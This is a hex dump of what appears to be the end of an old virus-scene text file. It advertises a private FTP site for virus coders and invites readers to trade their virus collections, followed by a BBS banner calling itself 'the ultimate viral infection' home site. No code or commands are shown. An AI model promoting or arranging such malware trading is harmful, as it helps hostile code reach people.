|000032b0| 45 2c 20 61 20 70 72 69 | 76 61 74 65 20 46 54 50 |E, a pri|vate FTP|
|000032c0| 20 73 69 74 65 20 66 6f | 72 20 76 69 72 61 6c 20 | site fo|r viral |
|000032d0| 72 65 73 65 61 63 68 65 | 72 73 2f 63 6f 64 65 72 |reseache|rs/coder|
|000032e0| 73 2e 20 49 27 6d 20 0a | 61 6c 77 61 79 73 20 6f |s. I'm .|always o|
|000032f0| 6e 20 74 68 65 20 6c 6f | 6f 6b 6f 75 74 20 66 6f |n the lo|okout fo|
|00003300| 72 20 6e 65 77 20 76 69 | 72 61 6c 20 6d 61 74 65 |r new vi|ral mate|
|00003310| 72 69 61 6c 2e 20 49 66 | 20 79 6f 75 27 64 20 6c |rial. If| you'd l|
|00003320| 69 6b 65 20 61 63 63 65 | 73 73 2c 20 6f 72 20 0a |ike acce|ss, or .|
|00003330| 6c 69 6b 65 20 74 6f 20 | 74 72 61 64 65 2c 20 65 |like to |trade, e|
|00003340| 6d 61 69 6c 20 6d 65 20 | 61 20 6c 69 73 74 20 6f |mail me |a list o|
|00003350| 66 20 79 6f 75 72 20 63 | 6f 6c 6c 65 63 74 69 6f |f your c|ollectio|
|00003360| 6e 2e 20 0a 0a 53 65 72 | 69 6f 75 73 20 69 6e 71 |n. ..Ser|ious inq|
|00003370| 75 69 72 69 65 73 20 6f | 6e 6c 79 2e 20 0a 0a 20 |uiries o|nly. .. |
|00003380| 20 20 20 20 20 20 da 20 | f9 f9 c4 c4 c4 f9 c4 20 | . |....... |
|00003390| 20 c4 c4 2d c4 f9 fa c4 | c4 c4 c4 c4 2d 20 2d 20 | ..-....|....- - |
|000033a0| c4 c4 c4 c4 c4 f9 c2 fa | c4 c4 c4 c4 2d 2d 20 c4 |........|....-- .|
|000033b0| c4 c4 c4 f9 f9 c4 2d 20 | c4 c4 2d c4 f9 fa c4 c4 |......- |..-.....|
|000033c0| fa 0a 20 20 20 20 20 20 | 20 b3 20 20 59 6f 6a 69 |.. | . Yoji|
|000033d0| 6d 62 6f 20 5b ed d8 eb | e6 ed 5d 20 20 20 20 20 |mbo [...|..] |
|000033e0| 20 20 20 20 20 20 20 20 | 20 f9 20 46 61 73 74 20 | | . Fast |
|000033f0| 61 73 20 74 68 65 20 57 | 69 6e 64 20 20 20 20 20 |as the W|ind |
|00003400| 20 20 20 f9 0a 20 20 20 | 20 20 20 20 f9 20 20 53 | .. | . S|
|00003410| 79 73 4f 70 3a 20 54 68 | 65 20 44 6f 6a 6f 20 42 |ysOp: Th|e Dojo B|
|00003420| 42 53 20 20 20 20 20 20 | 20 20 20 20 f9 20 51 75 |BS | . Qu|
|00003430| 69 65 74 20 61 73 20 74 | 68 65 20 46 6f 72 65 73 |iet as t|he Fores|
|00003440| 74 20 20 20 20 20 b3 0a | 20 20 20 20 20 20 20 b3 |t ..| .|
|00003450| 20 20 31 2e 37 69 33 2e | 34 33 36 2e 31 37 39 35 | 1.7i3.|436.1795|
|00003460| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 b3 | | .|
|00003470| 20 41 67 67 72 65 73 73 | 69 76 65 20 61 73 20 46 | Aggress|ive as F|
|00003480| 69 72 65 20 20 20 20 20 | 20 fa 0a 20 20 20 20 20 |ire | .. |
|00003490| 20 20 fa 20 20 51 55 61 | 52 61 4e 54 69 4e 45 20 | . QUa|RaNTiNE |
|000034a0| 48 6f 6d 65 53 69 74 65 | 20 20 20 20 20 20 20 20 |HomeSite| |
|000034b0| 20 20 fa 20 41 6e 64 20 | 20 20 20 20 20 20 20 20 | . And | |
|000034c0| 20 20 20 20 20 20 20 20 | 20 20 20 20 b3 0a 20 20 | | .. |
|000034d0| 20 20 20 20 20 b3 20 20 | 54 48 65 20 55 4c 54 69 | . |THe ULTi|
|000034e0| 4d 61 54 45 20 56 69 52 | 61 4c 20 49 6e 46 65 43 |MaTE ViR|aL InFeC|
|000034f0| 54 69 4f 4e 20 b3 20 49 | 6d 6d 6f 76 61 62 6c 65 |TiON . I|mmovable|
|00003500| 20 61 73 20 61 20 4d 6f | 75 6e 74 61 69 6e 20 b3 | as a Mo|untain .|
|00003510| 0a 20 20 20 20 20 20 20 | 20 f9 c4 20 2d c4 f9 f9 |. | .. -...|
|00003520| fa c4 c4 c4 c4 c4 c4 c4 | c4 c4 f9 f9 fa c4 c4 c4 |........|........|
|00003530| c4 20 c4 c4 fa c4 c4 20 | fa c4 c4 c4 c4 c4 c4 c4 |. ..... |........|
|00003540| fa f9 2d c4 c4 c4 c4 c4 | c4 c4 c4 c4 f9 fa c4 c4 |..-.....|........|
|00003550| c4 c4 0a 0a 0a | |..... | |
+--------+-------------------------+-------------------------+--------+--------+
